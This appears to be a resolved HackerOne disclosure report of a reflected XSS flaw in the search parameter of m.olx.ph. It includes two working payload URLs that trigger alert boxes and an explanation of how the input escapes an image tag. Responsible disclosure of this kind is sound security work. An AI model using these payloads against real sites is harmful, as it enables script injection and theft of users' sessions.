Reflected XSS at m.olx.ph
Medium
Vulnerability Details
## INTRO
The m.olx.ph domain is vulnerable to reflected XSS through the search function.
### EXPLOITABILITY & PoC
The following URL contains an XSS vector, which causes an alert box to appear
https://m.olx.ph/all-results?q=:%27%3E%3Cimg%20src=/%20onerror=alert%28document.domain%29%3E
or
https://m.olx.ph/all-results?q=:%27%3E%3CBODY%20ONLOAD=javascript:alert%281%29%3E
### Fix & Mitigation:
The escaping sequence is force with q=__:'>__ rendering this html code:
<img style="display:none;" alt="" src="https://LOGw305.ati-host.net/hit.xiti?s=524255&stc={"member_id":"","member_category":"free_user","page_name":"ads_list","page_nb":1,"keyword":":" height="1" width="1"> <- escape here closing <img> tag
","user_status":"unlogged_user"}' > <- this is rendered as html, before this we can inject the payloads
-
*Tested on Mozilla Firefox 45.0.2.
(Screenshots attached)
Please let me know if more info needed,
Best Regards,
@ak1t4
Actions
View on HackerOneReport Stats
- Report ID: 175410
- State: Closed
- Substate: resolved
- Upvotes: 5